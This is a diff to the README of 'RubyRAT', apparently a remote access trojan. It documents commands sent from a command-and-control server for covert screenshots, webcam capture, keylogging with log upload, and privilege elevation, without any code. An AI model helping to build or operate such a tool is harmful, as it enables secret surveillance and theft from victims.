WilleLX1/RubyRAT/README.md

 ### Basics
 1. `!help`: Displays a help menu of all commands.
 2. `!kill`: Disconnects client from C2.
+3. `!restart`: Restarts client.
+4. `!version`: Prints out current version of RubyRAT.

 ### Surveillance
 1. `!screenshot`: Takes a screenshot on the client side and sends it to C2.
 2. `!webcam`: Captures a picture using the client's webcam and sends it.
-3. `!dump`: Sends a file containing the keyloggers log to C2.
+3. `!dumplog`: Sends a file containing the keyloggers log to C2.
-4. `!log`: Toggle keylogging.
+4. `!startlog`: Start the keylogging.
+5. `!stoplog`: Stop the keylogging.

 ### Elevation / Persistence
 1. `!elevate`: Attempts to elevate from user to admin.